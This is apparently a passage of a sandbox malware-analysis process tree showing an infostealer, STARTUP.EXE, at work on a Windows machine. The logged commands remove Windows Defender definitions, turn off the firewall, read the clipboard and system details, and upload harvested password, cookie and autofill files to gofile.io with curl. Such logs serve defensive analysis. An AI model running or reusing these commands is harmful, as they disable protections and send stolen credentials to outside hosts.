        15⤵
        
        PID:13840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:17272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:7984
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:8296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:16580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:13908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:8772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:12780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        12⤵
        
        PID:14584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:4428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:4532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:6560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:7288
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:3616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:9736
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:14868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:11496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:12732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:16152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:7112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:8196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:8424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:10064
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:3208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:10004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:15096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:12020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:11460
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:13776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:11072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:13620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:5512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        10⤵
        
        PID:6288
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        11⤵
        
        PID:8036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
        10⤵
        
        PID:11784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        10⤵
        
        PID:12052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Get-Clipboard -TextFormatType Text"
        10⤵
        Clipboard Data
        
        PID:9308
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get csname, description, installdate, organization, registereduser, numberofprocesses
        10⤵
        
        PID:11848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
        10⤵
        
        PID:12676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store4.gofile.io/uploadFile"
        10⤵
        
        PID:14480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppassw.txt" https://store4.gofile.io/uploadFile"
        10⤵
        
        PID:14664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcook.txt" https://store4.gofile.io/uploadFile"
        10⤵
        
        PID:14940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:2228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:4104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:5308
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:4740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:7140
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:3180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:10152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:8864
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:13932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:10368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:8264
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:9608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:10336
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:15568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:12800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:17376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:16036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:6544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:4552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:8472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:10052
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:1572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:13092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6772
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:8320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:10136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:10744
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:15260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:10104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:9184
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:13832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:13100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:13120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        12⤵
        
        PID:14520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:5900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:7332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:8720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:14332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:15700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:10312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:9248
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:13916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:8628
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:16376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:17368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:14188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:2852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:7060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:9640
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:9112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:13460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:9960
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:16344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:15216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:8000
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:10624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:10552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        10⤵
        
        PID:12076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:5296
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:1756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:3196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:5588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:7732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:10752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:15328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:12256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:10352
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:16352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:12816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:17304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:6164
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:6480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:6992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:8048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:10168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:10184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:13348
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:14916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:9856
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:13808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:11352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:15136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:5716
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:10616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:7184
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:13848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:12232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:12616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        10⤵
        
        PID:14704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:3360
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:3680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:6348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:6716
        
